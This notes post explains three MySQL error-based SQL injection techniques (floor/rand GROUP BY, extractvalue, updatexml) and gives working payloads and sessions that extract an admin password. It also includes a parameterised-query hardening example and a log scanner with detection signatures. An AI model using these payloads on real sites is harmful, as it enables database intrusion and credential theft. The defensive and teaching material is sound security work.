Posting some of my old notes. When MySQL executes a statement it throws an error message, and PHP+MySQL sites often print that error text on the page, so the three methods below can be used to extract specific data through a crafted query.

Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is successfully leaked inside the duplicate-key error (the trailing 1 is the floor(rand(0)*2) digit that concat() appended). To retrieve other data, replace the version() expression with the desired subquery.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
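Both methods work only because the application splices the raw id into the SQL string and then prints the database's error text on the page. As an added example that is not part of the original post, the Python snippet below uses an in-memory SQLite table as a constructed stand-in for the `article` table (SQLite has no extractvalue() and no MySQL-style floor(rand()) GROUP BY error, so the error text differs, but the leakage channel, a raw database error reaching the client, is the same). It puts the vulnerable query next to a hardened version that validates the type, binds the value as a parameter, and returns only a generic message to the client while logging the real error server-side. The function and table names are the example's own.

```python
import logging
import sqlite3

log = logging.getLogger("article_app")

SELECT_SQL = "SELECT id, title, content FROM article WHERE id = "


def make_db():
    """Constructed in-memory stand-in for the `article` table used in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    conn.commit()
    return conn


def fetch_article_vulnerable(conn, raw_id):
    """Mirrors the vulnerable pattern: untrusted input spliced into the SQL
    string, and the database's own error message handed back to the page."""
    sql = SELECT_SQL + raw_id
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # Returning str(exc) to the client is exactly the channel that the
        # floor()/extractvalue()/updatexml() techniques read data through.
        return {"rows": [], "error": str(exc)}


def fetch_article_hardened(conn, raw_id):
    """Validate the type, bind the value as a parameter, and never expose
    the database error text to the client."""
    try:
        article_id = int(raw_id)                      # 1. id must be an integer
    except (TypeError, ValueError):
        return {"rows": [], "error": "invalid id"}    # generic; nothing reaches the DB
    try:
        # 2. Parameter binding: the value can never change the statement shape.
        rows = conn.execute(SELECT_SQL + "?", (article_id,)).fetchall()
        return {"rows": rows, "error": None}
    except sqlite3.Error as exc:
        # 3. The real message stays in the server-side log only.
        log.error("database error for id=%r: %s", article_id, exc)
        return {"rows": [], "error": "internal error"}
```

With the vulnerable function, an input such as `1 and 1=2` silently changes the result set and an input naming a non-existent function comes back to the client as the raw database error; the hardened function rejects both before the database sees them.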
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
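All three techniques leave two fingerprints a defender can alert on: the function names in the request (floor(rand(0)*2) together with GROUP BY, extractvalue(, updatexml() and, when the application echoes database errors, the characteristic error strings in the response body or application log (Duplicate entry '...' for key 'group_key', XPATH syntax error: '...'). As an added example, not part of the original post, the Python snippet below checks constructed Apache-style access-log lines and constructed MySQL error strings against those signatures; the IPs, paths and timestamps are made up, and the error strings reuse the format of the mysql client output shown above.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three techniques, applied to the
# URL-decoded, lower-cased request path.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.{0,20}?\)\s*\*\s*2\s*\)"),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
}

# Error-side signatures: the database error text that carries the leaked value.
# For the floor technique the last character of the leak is the floor(rand(0)*2)
# digit that the payload's concat() appended.
ERROR_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"Duplicate entry '(?P<leak>[^']*)' for key 'group_key'"),
    "xpath_error": re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'"),
}

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+) HTTP/')
CLIENT_IP = re.compile(r"^(?P<ip>\S+) ")

# Constructed sample access-log lines (Apache common-log style).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:10:00:07 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 500 231',
    '10.0.0.9 - - [01/Jan/2010:10:00:12 +0000] "GET /article.php?id=1%20and%20extractvalue(1,'
    'concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 198',
    '10.0.0.9 - - [01/Jan/2010:10:00:15 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,'
    'concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 205',
    # Benign request that contains the word "floor": must not match.
    '10.0.0.7 - - [01/Jan/2010:10:01:00 +0000] "GET /search.php?q=floor+plans HTTP/1.1" 200 1024',
]

# Constructed sample error strings in the format of the mysql client output.
SAMPLE_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "ERROR 1064 (42000): You have an error in your SQL syntax",   # ordinary syntax error: no leak
]


def classify_request(log_line):
    """Return the technique name whose signature appears in the request path, else None."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return None
    decoded = unquote_plus(match.group("path")).lower()
    for name, pattern in REQUEST_SIGNATURES.items():
        if pattern.search(decoded):
            return name
    return None


def classify_error(error_text):
    """Return (technique, leaked_value) when a database error text matches an
    error-based leakage signature, else None."""
    for name, pattern in ERROR_SIGNATURES.items():
        match = pattern.search(error_text)
        if match:
            return name, match.group("leak")
    return None


def scan_access_log(lines):
    """List of (client_ip, technique) for every log line carrying a signature."""
    findings = []
    for line in lines:
        technique = classify_request(line)
        if technique:
            findings.append((CLIENT_IP.match(line).group("ip"), technique))
    return findings


def scan_errors(texts):
    """List of (technique, leaked_value) for every error text that leaks data."""
    return [hit for hit in (classify_error(t) for t in texts) if hit]


if __name__ == "__main__":
    for ip, technique in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"request from {ip}: {technique}")
    for technique, leak in scan_errors(SAMPLE_ERRORS):
        print(f"leaked via {technique}: {leak!r}")
```

The request-side check is the one to run on a WAF or access log; the error-side check only fires if the application still echoes database errors, so a hit there doubles as proof that display of errors has not been turned off.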
Thanks to the foreign guys for all of this.